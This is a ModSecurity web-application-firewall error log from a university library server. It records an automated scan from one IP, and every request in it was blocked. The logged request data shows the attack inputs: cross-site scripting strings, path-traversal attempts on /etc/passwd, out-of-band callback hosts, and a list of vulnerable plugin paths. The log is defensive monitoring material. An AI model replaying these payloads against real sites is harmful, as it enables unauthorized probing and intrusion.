[Tue Aug 29 11:55:04.664809 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqRzIQAAAAM"]
[Tue Aug 29 11:55:05.975552 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KcCo-f0AAAqqtagAAAAA"]
[Tue Aug 29 11:55:06.062968 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApHRcsAAAAP"]
[Tue Aug 29 11:55:06.648584 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApbUcAAAAAh"]
[Tue Aug 29 11:55:08.546650 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqY5-YAAAAr"]
[Tue Aug 29 11:55:11.740991 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAoz8C4AAAAS"]
[Tue Aug 29 11:55:11.878928 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16L8Co-f0AAAqSwpEAAAAN"]
[Tue Aug 29 11:55:12.584743 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAqsV38AAAAB"]
[Tue Aug 29 11:55:14.549703 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApHRfEAAAAP"]
[Tue Aug 29 11:55:14.668966 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAAoz8D0AAAAS"]
[Tue Aug 29 11:55:16.840074 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6BwAAAAr"]
[Tue Aug 29 11:55:16.903853 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqSwq8AAAAN"]
[Tue Aug 29 11:55:17.655127 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqvjmwAAAAE"]
[Tue Aug 29 11:55:17.694456 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqeFTIAAAAx"]
[Tue Aug 29 11:55:18.606148 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqSwrkAAAAN"]
[Tue Aug 29 11:55:19.575091 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqTvp4AAAAa"]
[Tue Aug 29 11:55:19.779658 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAApbUe0AAAAh"]
[Tue Aug 29 11:55:20.547457 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqTvqEAAAAa"]
[Tue Aug 29 11:55:22.532315 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApXgoYAAAAU"]
[Tue Aug 29 11:55:22.605452 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApHRgYAAAAP"]
[Tue Aug 29 11:55:23.911861 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAqeFVMAAAAx"]
[Tue Aug 29 11:55:23.916740 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAoz8EsAAAAS"]
[Tue Aug 29 11:55:24.086740 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAAqSws8AAAAN"]
[Tue Aug 29 11:55:24.539977 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAoz8FAAAAAS"]
[Tue Aug 29 11:55:24.710422 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApXgpEAAAAU"]
[Tue Aug 29 11:55:25.644647 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAApbUg4AAAAh"]
[Tue Aug 29 11:55:25.761381 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAqTvqwAAAAa"]
[Tue Aug 29 11:55:26.731199 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAApa-P4AAAAg"]
[Tue Aug 29 11:55:28.571695 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAApa-QEAAAAg"]
